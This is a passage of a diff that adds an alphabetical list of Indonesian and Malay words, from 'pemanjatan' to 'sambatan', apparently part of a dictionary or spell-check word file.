+pemanjatan
+pemansuhan
+pemantapan
+pemantauan
+pemantik
+pemarah
+pemasak
+pemasangan
+pemasok
+pemasokan
+pemastian
+pemasukan
+pemasungan
+pemasyarakatan
+pematang
+pemauk
+pembabatan
+pembabitan
+pembaca
+pembacaan
+pembagian
+pembaharu
+pembaharuan
+pembahas
+pembahasan
+pembaiatan
+pembajakan
+pembakaran
+pembalak
+pembalakan
+pembalas
+pembalasan
+pembalikan
+pembalut
+pembalutan
+pembanding
+pembangkang
+pembangkit
+pembangkitan
+pembangun
+pembangunan
+pembantah
+pembantai
+pembantaian
+pembantar
+pembantu
+pembanyol
+pembaringan
+pembarut
+pembasmi
+pembasuh
+pembasuhan
+pembatalan
+pembatas
+pembatasan
+pembauran
+pembawa
+pembawaan
+pembawang
+pembayaran
+pembebas
+pembebasan
+pembebek
+pembeberan
+pembedaan
+pembedahan
+pembekal
+pembekalan
+pembekuan
+pembela
+pembelaan
+pembelahan
+pembelajaran
+pembelengguan
+pembeli
+pembelokan
+pembelot
+pembelotan
+pembenaan
+pembenahan
+pembenaran
+pembendung
+pembendungan
+pembengkakan
+pembengkokan
+pembenihan
+pembentangan
+pembentukan
+pembeo
+pemberadaban
+pemberang
+pemberangsang
+pemberani
+pemberat
+pemberhentian
+pemberi
+pemberian
+pemberita
+pemberitaan
+pemberkasan
+pemberkatan
+pemberontak
+pemberontakan
+pembersih
+pembersihan
+pembesar
+pembesaran
+pembetulan
+pembiakan
+pembiasaan
+pembiasan
+pembibitan
+pembicara
+pembicaraan
+pembilang
+pembilangan
+pembimbing
+pembina
+pembinasaan
+pembocoran
+pembohong
+pembonceng
+pembongkaran
+pemborong
+pemboros
+pemborosan
+pembuahan
+pembual
+pembuangan
+pembuat
+pembuatan
+pembubaran
+pembubuhan
+pembudayaan
+pembudidayaan
+pembukaan
+pembuktian
+pembuluh
+pembungkus
+pembungkusan
+pembunuh
+pembunuhan
+pembusukan
+pemecah
+pemecahan
+pemecatan
+pemegatan
+pemekaran
+pemeliharaan
+pemeluk
+pemenang
+pemencaran
+pemencilan
+pemenggalan
+pementasan
+pementingan
+pemenuhan
+pemeo
+pemeran
+pemeranan
+pemeras
+pemerasan
+pemerian
+pemeriksa
+pemeriksaan
+pemerintah
+pemerintahan
+pemertalan
+pemesan
+pemfokusan
+pemicu
+pemidang
+pemijatan
+pemikat
+pemikir
+pemikiran
+pemilahan
+pemilihan
+pemilikan
+pemimpi
+pemimpin
+peminat
+pemindahan
+peminggiran
+pemirsa
+pemisah
+pemisahan
+pemodal
+pemodernan
+pemotongan
+pemotret
+pemotretan
+pemrakarsa
+pemuaian
+pemuasan
+pemuatan
+pemuda
+pemugaran
+pemuja
+pemujaan
+pemuka
+pemukim
+pemula
+pemulangan
+pemulauan
+pemulihan
+pemungkas
+pemungut
+pemungutan
+pemupukan
+pemurah
+pemurnian
+pemusatan
+pemusik
+pemusnah
+pemusnahan
+pemutusan
+pen
+pena
+penabuh
+penabung
+penadbiran
+penafian
+penafsir
+penagih
+penagihan
+penahan
+penahanan
+penahapan
+penaikan
+penaja
+penajaan
+penajaman
+penaklukan
+penakrifan
+penaksiran
+penalti
+penamaan
+penambah
+penambat
+penampan
+penampi
+penampikan
+penampilan
+penampung
+penampungan
+penanam
+penanaman
+penanda
+penandasan
+penandatanganan
+penanganan
+penanggalan
+penanggap
+penanggulangan
+penanggung
+penanggungan
+penangis
+penangkal
+penangkalan
+penangkap
+penangkapan
+penangkaran
+penangkis
+penangkisan
+penanti
+penantian
+penanya
+penapis
+penapisan
+penari
+penarik
+penarung
+penasalan
+penasihat
+penat
+penata
+penataan
+penatar
+penataran
+penatu
+penaung
+penaungan
+penawan
+penawanan
+penawar
+penawaran
+pencabikan
+pencabulan
+pencabutan
+pencacahan
+pencacaran
+pencacat
+pencacau
+pencaci
+pencacian
+pencadang
+pencadangan
+pencahar
+pencaharian
+pencahayaan
+pencak
+pencakar
+pencalon
+pencalonan
+pencampuran
+pencanangan
+pencangkokan
+pencapaian
+pencaplokan
+pencarian
+pencatat
+pencatatan
+pencatuan
+pencecak
+penceluk
+pencemaran
+pencepatan
+pencerahan
+penceraian
+penceramah
+pencerapan
+pencerita
+penceritaan
+pencerminan
+pencernaan
+penceroboh
+pencerobohan
+pencet
+pencetak
+pencetus
+pencil
+pencilok
+pencinta
+pencipta
+penciptaan
+pencitraan
+pencium
+penciutan
+pencoleng
+pencomel
+pencong
+pencopet
+pencopetan
+pencopotan
+pencuci
+pencucian
+pencucuk
+penculik
+pencuri
+pencurian
+pendadah
+pendaftar
+pendaftaran
+pendagang
+pendahan
+pendahulu
+pendahuluan
+pendaki
+pendakian
+pendakwa
+pendakwah
+pendakwahan
+pendakyah
+pendakyahan
+pendalaman
+pendam
+pendamai
+pendamaian
+pendaman
+pendamping
+pendapa
+pendapat
+pendapatan
+pendar
+pendaram
+pendaratan
+pendataan
+pendatang
+pendataran
+pendaulat
+pendaulatan
+pendayagunaan
+pendebat
+pendedahan
+pendek
+pendekar
+pendekatan
+pendeklamasian
+pendeknya
+pendemonstrasi
+pendendang
+pendengar
+pendengki
+pendepakan
+pendera
+penderasan
+penderita
+penderitaan
+penderma
+pendesain
+pendesak
+pendeta
+pendewaan
+pendiam
+pendidik
+pendidikan
+pendingin
+pendiri
+pendirian
+pendistribusian
+pendompleng
+pendongeng
+pendorong
+penduduk
+pendudukan
+pendukung
+pendulang
+pendulum
+pendurhaka
+pendurhakaan
+pendusta
+penebak
+penebalan
+penebang
+penebangan
+penebar
+penebuk
+penebukan
+penebus
+penebusan
+penegakan
+penegangan
+penegasan
+penegasian
+peneguhan
+penekan
+penekanan
+penelaah
+penelaahan
+penelah
+penelik
+peneliti
+penelitian
+penelusuran
+penembusan
+penempatan
+penemu
+penemuan
+penenang
+penendang
+penengah
+penengkar
+penentang
+penentangan
+penentu
+penentuan
+penenung
+penerang
+penerangan
+penerapan
+penerbang
+penerbit
+penerbitan
+penerima
+penerimaan
+penerjang
+penerjemah
+penerjemahan
+penerjunan
+penerobos
+penerobosan
+peneroka
+penertiban
+penerus
+penerusan
+penetak
+penetakan
+penetapan
+penetasan
+penetralan
+penetrasi
+pengabadian
+pengabai
+pengabaian
+pengabaran
+pengabdian
+pengabenan
+pengabsahan
+pengabuan
+pengabulan
+pengacara
+pengacau
+pengadaan
+pengadang
+pengaderan
+pengadil
+pengadilan
+pengadu
+pengaduan
+pengagum
+pengagungan
+pengairan
+pengajar
+pengajaran
+pengajuan
+pengakap
+pengakhiran
+pengaktifan
+pengaktualan
+pengakuan
+pengalaman
+pengali
+pengalihan
+pengalihbahasaan
+pengalokasian
+pengamal
+pengamalan
+pengaman
+pengamanan
+pengamat
+pengamatan
+pengambil
+pengambilan
+pengampun
+pengampunan
+penganalisis
+pengancam
+pengancaman
+pengandaian
+penganekaragaman
+pengang
+penganggur
+pengangkaan
+pengangkatan
+pengangkut
+pengangkutan
+pengangon
+penganiayaan
+penganjakan
+penganjur
+pengantar
+pengantin
+penganugerahan
+penganyam
+pengap
+pengapalan
+pengapit
+pengar
+pengarah
+pengarahan
+pengarak
+pengarang
+pengarsipan
+pengaruh
+pengaryaan
+pengasah
+pengasahan
+pengasas
+pengasih
+pengasingan
+pengasong
+pengasuh
+pengasuhan
+pengatur
+pengaturan
+pengawal
+pengawalan
+pengawas
+pengawasan
+pengawetan
+pengayak
+pengayom
+pengayoman
+pengayuh
+pengebat
+pengebirian
+pengebumian
+pengebut
+pengecap
+pengecapan
+pengecat
+pengecatan
+pengecekan
+pengecer
+pengecoh
+pengecualian
+pengedaran
+pengedit
+pengeditan
+pengedraf
+pengedukan
+pengejaran
+pengejawantahan
+pengekangan
+pengekor
+pengelabuan
+pengelana
+pengelola
+pengelolaan
+pengemasan
+pengembalian
+pengembang
+pengembangan
+pengembangbiakan
+pengembara
+pengemis
+pengempa
+pengempang
+pengempangan
+pengemudi
+pengenal
+pengenalan
+pengendali
+pengendalian
+pengendapan
+pengendara
+pengepakan
+pengepresan
+pengepungan
+pengerahan
+pengeram
+pengeraman
+pengeratan
+pengerjaan
+pengertian
+pengerukan
+pengesahan
+pengesetan
+pengetahuan
+pengetam
+pengetaman
+pengetes
+penggabungan
+penggagas
+penggal
+penggalak
+penggalakan
+penggalan
+penggalian
+penggambar
+penggambaran
+penggandaan
+pengganggu
+pengganti
+penggantian
+penggarap
+penggarapan
+penggaris
+penggaru
+penggaruk
+penggawa
+penggede
+penggedor
+penggelapan
+penggeli
+penggemar
+penggembala
+penggembira
+penggenjot
+penggentar
+penggerak
+penggerebekan
+penggerek
+penggering
+penggiatan
+penggilingan
+penggodokan
+penggolongan
+penggorengan
+penggosok
+penggubah
+penggubahan
+penggugat
+penggumpalan
+pengguna
+penggunaan
+penggundulan
+penghabisan
+penghadapan
+penghalau
+penghalauan
+penghambatan
+penghamburan
+penghamilan
+penghapus
+penghapusan
+pengharaman
+pengharmonisan
+pengharum
+penghasil
+penghasilan
+penghasut
+penghayatan
+penghela
+penghematan
+penghias
+penghibur
+penghidu
+penghidupan
+penghimpunan
+penghindaran
+penghisap
+penghisapan
+penghitungan
+penghormatan
+penghubung
+penghulu
+penghuni
+penghutanan
+pengikisan
+pengikut
+pengimbuhan
+pengimpor
+pengimporan
+pengimunan
+penginapan
+pengindraan
+pengingkaran
+pengintai
+pengintaian
+pengintensifan
+pengintip
+pengiriman
+pengiring
+pengiritan
+pengisolasian
+pengistimewaan
+pengkaji
+pengkajian
+pengkar
+pengkhayal
+pengkhianat
+pengkhianatan
+pengkhotbah
+pengkhususan
+pengki
+pengkis
+pengklarifikasian
+pengkol
+pengkolan
+pengkor
+penglihat
+penglihatan
+pengobat
+pengobatan
+pengobralan
+pengoceh
+pengocok
+pengolahan
+pengontrol
+pengoperasian
+pengoplos
+pengorbanan
+pengorganisasian
+pengotoran
+pengozonan
+penguapan
+penguasa
+penguasaan
+penguatan
+pengubah
+pengubahan
+penguberan
+penguburan
+pengucap
+pengucapan
+pengucilan
+pengudusan
+pengujar
+pengujaran
+penguji
+pengujian
+pengukir
+pengukur
+pengulangan
+pengulas
+pengultusan
+pengumpak
+pengumuman
+pengunduran
+pengungkit
+pengungsi
+pengungsian
+pengunjung
+penguraian
+pengurangan
+pengurus
+pengurusan
+pengurutan
+pengusaha
+pengusahaan
+pengusiran
+pengusut
+pengusutan
+pengutamaan
+pengutang
+pengutaraan
+pengutil
+pengutuban
+pengutusan
+peniadaan
+penikam
+penikaman
+penilai
+penilaian
+penilik
+penilikan
+penimbang
+penimbun
+penimbunan
+penindas
+penindasan
+pening
+peninggalan
+peningkatan
+peninjau
+peninjauan
+penipu
+penipuan
+peniru
+peniruan
+penis
+peniti
+penitikberatan
+penitisan
+penjabal
+penjabalan
+penjabaran
+penjabat
+penjadwalan
+penjaga
+penjagaan
+penjagalan
+penjahat
+penjahit
+penjaja
+penjajah
+penjajahan
+penjajakan
+penjala
+penjambret
+penjamin
+penjara
+penjarah
+penjarahan
+penjawat
+penjebak
+penjelajah
+penjenisan
+penjenjangan
+penjepit
+penjepretan
+penjernihan
+penjinakan
+penjiplak
+penjiplakan
+penjual
+penjualan
+penjumlahan
+penjungkirbalikan
+penjuru
+penjurusan
+penodong
+penokoh
+penolak
+penolakan
+penolong
+penomoran
+penongkat
+penonton
+penopang
+penoreh
+pensil
+pensiun
+pensiunan
+penstrukturan
+pensyarah
+pentas
+pentil
+penting
+pentol
+pentolan
+pentungan
+penuaian
+penuangan
+penubuhan
+penudingan
+penuh
+penukar
+penukaran
+penularan
+penulis
+penulisan
+penumbuk
+penumpang
+penumpasan
+penumpil
+penumpu
+penumpukan
+penunaian
+penundaan
+penundukan
+penunggu
+penunjang
+penunjuk
+penunjukan
+penuntasan
+penuntun
+penuntut
+penurunan
+penutup
+penutupan
+penutur
+penuturan
+penyabar
+penyabot
+penyabotan
+penyadap
+penyadapan
+penyadur
+penyaduran
+penyair
+penyajian
+penyakar
+penyakat
+penyakit
+penyalin
+penyalinan
+penyalur
+penyaluran
+penyalutan
+penyamaan
+penyamaran
+penyambar
+penyampai
+penyamun
+penyamunan
+penyangga
+penyanggah
+penyangkal
+penyangkalan
+penyantun
+penyanyi
+penyapu
+penyaring
+penyaringan
+penyaruan
+penyatuan
+penyayang
+penyebab
+penyebar
+penyebaran
+penyeberangan
+penyebukan
+penyebutan
+penyedap
+penyederhanaan
+penyediaan
+penyedot
+penyedotan
+penyegaran
+penyejuk
+penyek
+penyekat
+penyekatan
+penyelaan
+penyelam
+penyelaman
+penyelamat
+penyelamatan
+penyelarasan
+penyelenggara
+penyelenggaraan
+penyelesaian
+penyeleweng
+penyelewengan
+penyelia
+penyeliaan
+penyelidik
+penyelidikan
+penyelundup
+penyelundupan
+penyemaian
+penyembah
+penyembahan
+penyembelih
+penyembelihan
+penyembuhan
+penyemburan
+penyempal
+penyempitan
+penyempurnaan
+penyemu
+penyemuan
+penyendiri
+penyendirian
+penyengap
+penyengauan
+penyensor
+penyensoran
+penyepuhan
+penyeragaman
+penyerahan
+penyerang
+penyerangan
+penyeranta
+penyerapan
+penyerasian
+penyerbu
+penyerbuan
+penyerbukan
+penyergapan
+penyerobotan
+penyertaan
+penyesalan
+penyesuaian
+penyetara
+penyetir
+penyetopan
+penyetoran
+penyiapan
+penyiar
+penyiaran
+penyidik
+penyidikan
+penyigian
+penyiksaan
+penyilap
+penyilihan
+penyimpan
+penyimpangan
+penyinaran
+penyingkiran
+penyiraman
+penyisihan
+penyisipan
+penyisteman
+penyitaan
+penyok
+penyokong
+penyorotan
+penyortiran
+penyu
+penyuburan
+penyucian
+penyudah
+penyudahan
+penyulihan
+penyulingan
+penyuluh
+penyuluhan
+penyulut
+penyumbang
+penyumbat
+penyunatan
+penyungguhan
+penyunting
+penyuntingan
+penyuplai
+penyusun
+penyusunan
+penyusup
+penyusupan
+penyusutan
+pepah
+pepas
+pepat
+pepatah
+pepaya
+peperangan
+pepes
+pepet
+per
+pera
+peraba
+perabotan
+perabuan
+perada
+peradaban
+peradang
+peradilan
+peraduan
+peraga
+peragian
+perah
+perahu
+perai
+perairan
+perak
+perakit
+perakus
+peralatan
+peralihan
+peram
+peramal
+peramalan
+perambah
+perampang
+perampas
+perampasan
+perampok
+peran
+peranakan
+peranan
+perancang
+perancangan
+perang
+perangah
+perangai
+peranggu
+peranginan
+perangkaan
+perangkap
+perangkat
+perangsang
+peranjat
+perantara
+perantaraan
+perantau
+perantauan
+peranti
+perapian
+perarakan
+perasa
+perasapan
+peraturan
+perawakan
+perawan
+perawat
+perawatan
+perawis
+perayaan
+perbahasaan
+perbaikan
+perbalahan
+perban
+perbandaran
+perbandingan
+perbantahan
+perbanyakan
+perbaraan
+perbatasan
+perbauran
+perbawa
+perbedaan
+perbekalan
+perbendaharaan
+perbincangan
+perbintangan
+perbuatan
+perburuan
+perca
+percabangan
+percakapan
+percakaran
+percampuran
+percaturan
+percaya
+percederaan
+percekcokan
+percepatan
+perceraian
+percik
+percintaan
+percis
+percobaan
+percul
+percuma
+perdagangan
+perdamaian
+perdana
+perdarahan
+perdata
+perdebatan
+perdu
+perdua
+perdukunan
+perdusunan
+perebutan
+peredaran
+peredus
+perejang
+pereka
+perekat
+peremajaan
+perempuan
+perendaman
+perendangan
+perenggang
+perengus
+perengut
+perepet
+peres
+perewa
+perfek
+perforasi
+perforator
+performa
+pergandaan
+pergantian
+pergelaran
+pergelutan
+pergesekan
+pergi
+pergiliran
+pergok
+pergolakan
+pergonglian
+pergulatan
+perguruan
+perhambaan
+perhati
+perhatian
+perhelatan
+perhentian
+perhiasan
+perhimpunan
+perhinggaan
+perhitungan
+perhubungan
+peri
+peria
+perian
+peribadatan
+peribahasa
+peribut
+perigi
+perih
+perihal
+perikatan
+periksa
+perilaku
+perimbangan
+perincisan
+peringatan
+peringkat
+perintah
+perintang
+perintis
+periode
+periodik
+periodisasi
+perisa
+perisai
+perisau
+periset
+peristilahan
+peristirahatan
+peristiwa
+peritonitis
+periuk
+perjaka
+perjalanan
+perjamuan
+perjanjian
+perjodohan
+perjuangan
+perjudian
+perjumpaan
+perkakas
+perkalian
+perkamusan
+perkara
+perkasa
+perkataan
+perkauman
+perkawanan
+perkembangan
+perkembangbiakan
+perkenalan
+perkenan
+perkiraan
+perkisaran
+perkomplotan
+perkongsian
+perkudaan
+perkutut
+perladangan
+perlagaan
+perlambang
+perlambatan
+perlawanan
+perlengkapan
+perlente
+perlindungan
+perlintasan
+perlipatan
+perlombaan
+perlop
+perlu
+perluasan
+permadani
+permaduan
+permai
+permainan
+permaisuri
+permak
+permakaman
+permalaman
+permandian
+permanen
+permasalahan
+permata
+permen
+permenungan
+permintaan
+permisalan
+permisi
+permisif
+permodalan
+permohonan
+permufakatan
+permukaan
+permukiman
+permulaan
+permuliaan
+permusuhan
+permutasi
+pernah
+pernalaran
+pernapasan
+pernik
+pernikahan
+pernis
+pernyataan
+perogoh
+peroleh
+perolehan
+perombakan
+perompak
+perompakan
+peron
+perona
+peronce
+peroncean
+peronda
+perondaan
+perongos
+peronyok
+perot
+peroyal
+perpadanan
+perpaduan
+perpajakan
+perpanjangan
+perpautan
+perpecahan
+perpelancongan
+perpindahan
+perpisahan
+perpustakaan
+perputaran
+persabungan
+persahabatan
+persaingan
+persaksian
+persalinan
+persamaan
+persangkaan
+persantapan
+persatuan
+persaudaraan
+persebaran
+persediaan
+persegi
+persekongkolan
+persekot
+persekutuan
+perselingkuhan
+perselisihan
+persemakmuran
+persemayaman
+persembahan
+persembunyian
+persen
+persendian
+persengketaan
+persentase
+persentuhan
+persepakatan
+persepsi
+perseptif
+perserikatan
+perserupaan
+persesuaian
+perseteruan
+persetujuan
+persewaan
+persiapan
+persiaran
+persil
+persilangan
+persimpangan
+persinggahan
+persis
+persisten
+persneling
+persoalan
+person
+persona
+personal
+personalitas
+personel
+perspektif
+persuaan
+persuasi
+persurata
+pertahanan
+pertalan
+pertalian
+pertama
+pertambahan
+pertambatan
+pertanahan
+pertanda
+pertandingan
+pertanggungan
+pertanian
+pertanyaan
+pertapaan
+pertarakan
+pertaruhan
+pertarungan
+pertautan
+pertemanan
+pertembungan
+pertempuran
+pertengahan
+pertengkaran
+pertentangan
+pertepatan
+pertikaian
+pertimbangan
+pertinggal
+pertiwi
+pertolongan
+pertuanan
+pertukaran
+pertumbuhan
+pertunjukan
+perturutan
+pertusis
+peruasan
+perubahan
+perulangan
+perulasan
+perumpamaan
+perunding
+perundingan
+perunggu
+perungut
+peruntuh
+peruntukan
+peruntungan
+perupa
+perusahaan
+perusak
+perusakan
+perusuh
+perut
+perutusan
+perwakilan
+perwatakan
+perwira
+perwujudan
+pes
+pesai
+pesaing
+pesakitan
+pesam
+pesan
+pesanan
+pesanggrahan
+pesantren
+pesat
+pesawat
+pesek
+peselingkuh
+peserta
+pesilat
+pesimis
+pesimisme
+pesing
+pesiraman
+pesisir
+pesohor
+pesona
+pesong
+pesta
+pestisida
+pesulap
+pesuruh
+peta
+petai
+petak
+petaka
+petala
+petanda
+petandang
+petang
+petani
+petapa
+petaruh
+petasan
+petatar
+peternak
+peti
+petiduran
+petikan
+petinggi
+petinju
+petir
+petirahan
+petisi
+petitih
+petroleum
+petromaks
+petua
+petuah
+petualang
+petualangan
+petugas
+petunjuk
+petus
+petut
+peubah
+pewarnaan
+pewarta
+pewartaan
+pewatas
+peyang
+peyot
+peziarah
+pezikir
+piadah
+piagam
+piala
+pialang
+piama
+piano
+piara
+piaraan
+pias
+piawai
+picik
+picing
+picis
+picisan
+picu
+pidana
+pidato
+pigura
+pihak
+pijah
+pijak
+pijakan
+pijar
+pijat
+piket
+pikir
+pikiran
+piknik
+pikul
+pikulan
+pikun
+pil
+pilah
+pilar
+pilek
+pilih
+pilihan
+pilin
+pilon
+pilot
+pilu
+pimpinan
+pin
+pinang
+pinar
+pincang
+pincut
+pinda
+pindaan
+pindah
+pinggan
+pinggang
+pinggir
+pinggiran
+pinggul
+pingitan
+pingkal
+pingpong
+pingsan
+pinjam
+pinset
+pintal
+pintar
+pintas
+pintasan
+pintu
+pinus
+pion
+pionir
+pipa
+pipet
+pipi
+pipih
+pipis
+pipisan
+pipit
+pipitan
+pirai
+piramida
+pirang
+pirau
+piring
+piringan
+pirsa
+pisah
+pisang
+pisau
+pises
+pistol
+pit
+pita
+pitam
+pitarah
+pitingan
+piton
+piuh
+piut
+piutang
+pivot
+plafon
+plagiarisme
+plagiat
+plagiator
+plakat
+plaket
+planet
+planetoid
+plang
+planing
+plasenta
+plastis
+plastisitas
+plat
+platform
+platina
+plato
+plebisit
+pleidoi
+pleno
+plin
+plonco
+plong
+plontos
+plot
+plumbum
+plural
+pluralitas
+plus
+pneumonia
+poci
+podium
+pohon
+poin
+pojok
+poket
+pokok
+pokoknya
+pokrol
+pokrolan
+pol
+pola
+polah
+polarisasi
+polaritas
+polemik
+polemis
+poles
+poligami
+poligon
+polikel
+polisi
+politik
+politis
+polong
+polos
+polusi
+pompa
+pondok
+pondokan
+pongah
+pongsu
+ponten
+popi
+popok
+popularitas
+populasi
+populer
+populisme
+porak
+pori
+porno
+poros
+porselen
+porsi
+portal
+portir
+pos
+pose
+posesif
+posisi
+positif
+poster
+posterior
+postulat
+postur
+pot
+potasium
+potek
+potensi
+potensial
+potlot
+potol
+potong
+potongan
+potret
+poyang
+prabu
+praduga
+pragmatis
+prahara
+praja
+prajurit
+prakarsa
+prakarya
+prakata
+prakira
+prakiraan
+prakondisi
+praktik
+praktis
+praktisi
+prameswari
+pramuniaga
+pramuria
+pramuwisata
+pramuwisma
+pranata
+pranatal
+prasaja
+prasangka
+prasaran
+prasarana
+prasasti
+prasetia
+prawacana
+prayitna
+preambul
+predator
+predestinasi
+predikat
+prediksi
+predisposisi
+prefiks
+prei
+prelude
+preman
+prematur
+premi
+premis
+premium
+premolar
+preposisi
+prerogatif
+pres
+preseden
+presensi
+presentasi
+preservasi
+presiden
+presisi
+preskripsi
+preskriptif
+prestasi
+prestise
+prestisius
+presumsi
+pretel
+pretensi
+pretensius
+prevalensi
+preventif
+pria
+priayi
+pribadi
+pribumi
+prigel
+prihatin
+prima
+primadona
+primbon
+primer
+primitif
+pringis
+prinsip
+prinsipil
+prioritas
+privat
+privatisasi
+privilese
+pro
+probabilitas
+problem
+problematis
+prodeo
+produk
+produksi
+produktif
+produktivitas
+produsen
+produser
+profan
+profesi
+profesional
+profesor
+profetik
+profil
+profit
+prognosis
+program
+programa
+progres
+progresif
+prohibisi
+proklamasi
+proletariat
+prolog
+prominen
+promosi
+promotor
+pronomina
+propaganda
+propeler
+properti
+proporsi
+proporsional
+proposal
+proposisi
+prosa
+prosais
+prosedur
+proses
+prosesi
+prospek
+prospektif
+prospektus
+prostitusi
+protagonis
+protein
+proteksi
+protektif
+protektor
+protes
+protokol
+protoplasma
+prototipe
+provinsi
+provinsial
+provinsialisme
+provisional
+provokasi
+provokatif
+provokator
+proyek
+proyeksi
+pseudo
+pseudonim
+psike
+psikis
+psikologi
+psikologis
+psikopat
+psikosis
+puak
+puaka
+pualam
+puan
+puas
+puasa
+pub
+puber
+pubertas
+publik
+publikasi
+publisistik
+publisitas
+pucat
+pucuk
+pudar
+puder
+pugak
+pugar
+puguh
+puing
+puisi
+puja
+pujaan
+pujangga
+puji
+pujian
+pukal
+pukang
+pukat
+pukau
+pukul
+pukulan
+pula
+pulang
+pulas
+pulau
+pulih
+pulp
+pulsa
+puluh
+pulun
+pulung
+pulut
+pumpunan
+pun
+punah
+punakawan
+punca
+puncak
+pundak
+pundi
+pundung
+punggah
+pungguk
+punggung
+pungkang
+pungkas
+pungkasan
+pungkur
+pungtuasi
+pungut
+pungutan
+punjung
+puntal
+puntalan
+puntianak
+puntir
+puntung
+punuk
+punya
+pupa
+pupil
+pupuh
+pupuk
+pupur
+pupus
+puput
+pura
+puraan
+purata
+purba
+purbakala
+purbasangka
+purbawara
+purbawisesa
+purdah
+purgatif
+puri
+purifikasi
+purna
+purnabakti
+purnakarya
+purnakaryawan
+purnama
+purnawirawan
+puru
+puruk
+purwa
+purwakanti
+purwarupa
+pusaka
+pusam
+pusang
+pusar
+pusara
+pusaran
+pusat
+pusing
+pusingan
+puspa
+pusparagam
+puspawarna
+pustaka
+pustakawan
+pusung
+pusut
+putar
+putaran
+putarwali
+puter
+puti
+putih
+putik
+puting
+putra
+putranda
+putri
+putus
+putusan
+puyeng
+puyuh
+qada
+qadar
+qadim
+qalam
+qanun
+qari
+qariah
+qasar
+qiamulail
+quran
+raba
+rabaan
+rabak
+rabani
+rabat
+rabi
+rabik
+rabit
+rabuk
+rabun
+rabung
+racikan
+racun
+rada
+radai
+radang
+radar
+radas
+radikal
+radiks
+radiogram
+radis
+radius
+radu
+rafi
+raga
+ragam
+ragangan
+ragi
+ragil
+ragu
+ragut
+rahak
+raharja
+rahasia
+rahib
+rahim
+rahman
+rahmat
+raib
+raih
+raja
+rajah
+rajin
+rajungan
+rajut
+rajutan
+rak
+rakaat
+rakit
+raksa
+raksasa
+rakus
+rakyat
+ralat
+ram
+rama
+ramadan
+ramah
+ramai
+ramal
+ramalan
+ramanda
+rambak
+rambat
+rambu
+rambut
+rambutan
+rami
+ramin
+rampak
+rampang
+rampas
+rampasan
+ramping
+rampung
+ramuan
+ranah
+rancak
+rancangan
+rancap
+rancu
+randa
+randih
+randu
+rang
+rangah
+rangas
+ranggah
+ranggas
+ranggi
+ranggit
+rangka
+rangkai
+rangkaian
+rangkak
+rangkap
+rangkulan
+rangkuman
+rangkung
+rani
+ranjang
+rantai
+rantaian
+rantau
+ranting
+rapal
+rapat
+rapi
+rapik
+rapuh
+rapun
+rapung
+ras
+rasa
+rasam
+rasi
+rasio
+rasional
+rasionalitas
+rata
+ratna
+ratu
+ratus
+raudah
+raut
+rawa
+rawan
+rawat
+rawi
+rawit
+raya
+rayahan
+rayap
+rayapan
+reaksi
+rebah
+rebana
+rebeh
+rebes
+reboisasi
+rebon
+rebung
+rebut
+rebutan
+reca
+recehan
+recikan
+recok
+reda
+redaksi
+redaktur
+redam
+reduksi
+redum
+redup
+reduplikasi
+referat
+referensi
+refleks
+refleksi
+reflektif
+reflektor
+reformasi
+reformis
+refraksi
+regang
+regu
+rehat
+rejasa
+rekaan
+rekahan
+rekakan
+rekan
+rekata
+rekening
+reklame
+rekonsiliasi
+rekonstruksi
+rekreasi
+rel
+rela
+relai
+relasi
+relatif
+religi
+religiositas
+relikui
+reluk
+relung
+remah
+remai
+remaja
+remang
+remas
+rembuk
+rembulan
+remuk
+rencana
+renda
+rendah
+rendahan
+rendang
+rendeng
+rengek
+renggang
+renggutan
+rengkah
+rengkahan
+rengkung
+rengrengan
+rengus
+rengut
+renik
+renkinang
+renovasi
+rental
+rentan
+rentang
+rente
+rentengan
+rentenir
+rentetan
+renungan
+renyah
+renyai
+renyuk
+renyut
+repang
+repas
+repihan
+repot
+reput
+reputasi
+reras
+resah
+resam
+resek
+resensi
+resep
+resepsi
+reserve
+resi
+residu
+resistan
+resistansi
+resmi
+resolusi
+resonan
+resonansi
+responsibilitas
+restu
+retak
+retakan
+retas
+retensi
+retribusi
+retrogresi
+retur
+revisi
+rewel
+rezeki
+rezim
+ria
+riak
+riam
+riang
+riap
+rias
+riasan
+riba
+ribaan
+ribuan
+ribut
+rica
+ricuh
+ridip
+rikuh
+rim
+rimba
+rimbas
+rimbat
+rimbun
+rimbunan
+rinai
+rindu
+ring
+ringan
+ringis
+ringkas
+ringkasan
+rintangan
+rintihan
+rintik
+risalah
+risau
+riset
+risi
+risiko
+ritme
+ritual
+riuh
+rival
+rivalitas
+riwayat
+robek
+robekan
+roboh
+robohan
+robok
+robot
+robotika
+roda
+rodi
+roh
+rohaniwan
+rohaniwati
+rok
+roket
+rokok
+rol
+roma
+roman
+rombakan
+rombeng
+rombengan
+rombong
+rombongan
+rompes
+rompi
+rompoh
+rompok
+rompyok
+rona
+ronda
+rongga
+ronggeng
+rongkongan
+rongsok
+rongsokan
+ronta
+rontok
+rosario
+rosot
+rotasi
+royal
+royalti
+royemen
+royong
+ruah
+ruai
+ruam
+ruang
+ruas
+ruaya
+rubela
+rubiah
+rubrik
+rubu
+rudal
+rudin
+rugi
+ruhban
+ruhbanat
+ruislag
+ruji
+rujuk
+rujukan
+rukun
+rukyat
+rum
+rumah
+rumbai
+rumit
+rumpaka
+rumpang
+rumpil
+rumpun
+rumput
+rumputan
+rumusan
+runcing
+runcit
+runding
+rungguhan
+rungkuh
+rungkup
+rungu
+rungut
+rungutkan
+runjung
+runsing
+runtuh
+runtuhan
+runtun
+runtunan
+runtut
+runtutan
+runut
+runyam
+rupa
+rupanya
+rupawan
+rusa
+rusak
+rusuh
+rusuhan
+rusuk
+rute
+ruwah
+ruwat
+ruwatan
+ruwet
+ruyung
+ruyup
+saat
+saban
+sabar
+sabda
+sabet
+sabit
+sablon
+sabot
+sabotase
+sabuk
+sabun
+sabung
+sabungan
+sabur
+sabut
+sadak
+sadap
+sadapan
+sadar
+sadau
+sadel
+sadik
+sadis
+sadisme
+sado
+sadur
+saduran
+saf
+safa
+safari
+sagang
+sagitarius
+sagu
+sagur
+sah
+sahabat
+sahaja
+saham
+sahang
+sahara
+sahibulbait
+sahibulhikayat
+sahifah
+sahih
+sahut
+sahutan
+saing
+sains
+saintifik
+saja
+sajak
+saji
+sajian
+sak
+saka
+sakaguru
+sakal
+sakar
+sakat
+saki
+sakinah
+sakit
+sakitan
+sakral
+sakramen
+saksama
+saksi
+sakti
+saku
+salah
+salai
+salak
+salam
+salat
+salatin
+saldo
+saleh
+salib
+salih
+salim
+salin
+salinan
+saling
+salip
+salmon
+saluk
+salur
+saluran
+salut
+sama
+samak
+saman
+samar
+samaran
+sambang
+sambar
+sambaran
+sambat
+sambatan
